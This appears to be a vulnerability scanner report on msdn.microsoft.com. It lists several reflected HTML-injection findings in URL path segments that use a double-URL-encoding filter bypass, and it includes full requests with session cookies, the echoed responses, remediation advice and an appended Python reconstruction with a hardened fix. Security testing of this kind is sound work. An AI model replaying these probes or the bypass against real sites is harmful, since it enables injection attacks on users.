17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155073.aspx67843"><a>e5b048815e6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83582%2522%253e%253ca%253e41cf0a39ac3 was submitted in the REST URL parameter 1. This input was echoed as 83582"><a>41cf0a39ac3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us83582%2522%253e%253ca%253e41cf0a39ac3/library/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us83582"><a>41cf0a39ac3/library/aa187916" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2c1%2522%253e%253ca%253ed10d1626b7c was submitted in the REST URL parameter 2. This input was echoed as da2c1"><a>d10d1626b7c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryda2c1%2522%253e%253ca%253ed10d1626b7c/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryda2c1"><a>d10d1626b7c/aa187916" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e58%2522%253e%253ca%253eb41c43eaea6 was submitted in the REST URL parameter 3. This input was echoed as 56e58"><a>b41c43eaea6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa187916.aspx56e58%2522%253e%253ca%253eb41c43eaea6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa187916.aspx56e58"><a>b41c43eaea6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757a2%2522%253e%253ca%253e39c3f7167ab was submitted in the REST URL parameter 1. This input was echoed as 757a2"><a>39c3f7167ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us757a2%2522%253e%253ca%253e39c3f7167ab/library/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us757a2"><a>39c3f7167ab/library/bb726434(office.12" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea44%2522%253e%253ca%253efa3efb9bd47 was submitted in the REST URL parameter 2. This input was echoed as 6ea44"><a>fa3efb9bd47 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6ea44%2522%253e%253ca%253efa3efb9bd47/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6ea44"><a>fa3efb9bd47/bb726434(office.12" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7fbc%2522%253e%253ca%253eb1e36bffcd2 was submitted in the REST URL parameter 3. This input was echoed as d7fbc"><a>b1e36bffcd2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726434(office.12d7fbc%2522%253e%253ca%253eb1e36bffcd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12d7fbc"><a>b1e36bffcd2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a56b8%2522%253e%253ca%253ec3a0e51bb21 was submitted in the REST URL parameter 1. This input was echoed as a56b8"><a>c3a0e51bb21 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa56b8%2522%253e%253ca%253ec3a0e51bb21/library/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa56b8"><a>c3a0e51bb21/library/bb726434(office.12)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98201%2522%253e%253ca%253e9d927c0b48e was submitted in the REST URL parameter 2. This input was echoed as 98201"><a>9d927c0b48e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library98201%2522%253e%253ca%253e9d927c0b48e/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library98201"><a>9d927c0b48e/bb726434(office.12)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae2f%2522%253e%253ca%253e4fee7d32026 was submitted in the REST URL parameter 3. This input was echoed as dae2f"><a>4fee7d32026 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726434(office.12).aspxdae2f%2522%253e%253ca%253e4fee7d32026 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12).aspxdae2f"><a>4fee7d32026" /> ...[SNIP]...
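The double-URL-encoding bypass and the remediation ordering described in the finding above, reconstructed as a worked example. This is added here and is not code from the scanner, from the original report, or from msdn.microsoft.com; the blocklist filter, the decode pipeline and the way the fromPage hidden field is built are assumptions standing in for behaviour the report only observes from the outside. The probe string and the echoed output are the ones shown in the finding. The same example also covers the identical findings for REST URL parameters 1, 2 and 3 that follow.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Probe from the report: "%2522%253e%253ca%253e" is the double-URL-encoded form of
# '"><a>'. The random markers dae2f / 4fee7d32026 bracket it so the echo can be
# located in the response. The single-encoded form is what the filter catches.
DOUBLE_ENCODED = 'dae2f%2522%253e%253ca%253e4fee7d32026'
SINGLE_ENCODED = 'dae2f%22%3e%3ca%3e4fee7d32026'

# Assumed blocklist: characters the application is observed to reject when they
# arrive singly encoded. The real filter's exact contents are not known.
BLOCKED = set('<>"\'')


def server_decode(raw_segment: str) -> str:
    """The one URL-decode the web server performs before the application sees the path."""
    return unquote(raw_segment)


def passes_filter(value: str) -> bool:
    """Blocklist check, applied to whatever string the application hands it."""
    return not (BLOCKED & set(value))


def vulnerable_render(raw_segment: str) -> str:
    """Hypothetical reconstruction of the flaw: validate the server-decoded value,
    THEN apply a second, custom URL-decode, and copy the result into a double-quoted
    attribute without any output encoding."""
    once = server_decode(raw_segment)
    if not passes_filter(once):
        raise ValueError('blocked by filter')
    twice = unquote(once)  # canonicalisation happens after validation: the bug
    return f'<input type="hidden" name="fromPage" value="{twice}" />'


def hardened_render(raw_segment: str, keep_custom_decode: bool = False) -> str:
    """Fix. Preferred: no second decode at all, since the server already did one.
    If a custom decode must stay, it runs BEFORE validation so the filter sees the
    same characters the page will contain. Either way the value is attribute-encoded
    at the point of output, so a quote that slips past the filter cannot close the
    attribute."""
    canonical = server_decode(raw_segment)
    if keep_custom_decode:
        canonical = unquote(canonical)
    if not passes_filter(canonical):
        raise ValueError('blocked by filter')
    return f'<input type="hidden" name="fromPage" value="{html.escape(canonical, quote=True)}" />'


class _TagCollector(HTMLParser):
    """Records start tags, to show what an HTML parser makes of the rendered markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def outcome(render, raw_segment: str) -> str:
    """'blocked' if the filter rejects the input, otherwise the start tags the output parses to."""
    try:
        markup = render(raw_segment)
    except ValueError:
        return 'blocked'
    return ','.join(start_tags(markup))


if __name__ == '__main__':
    for name, render in (('vulnerable', vulnerable_render), ('hardened', hardened_render)):
        for label, probe in (('single-encoded', SINGLE_ENCODED), ('double-encoded', DOUBLE_ENCODED)):
            print(f'{name:10} {label:15} -> {outcome(render, probe)}')
```

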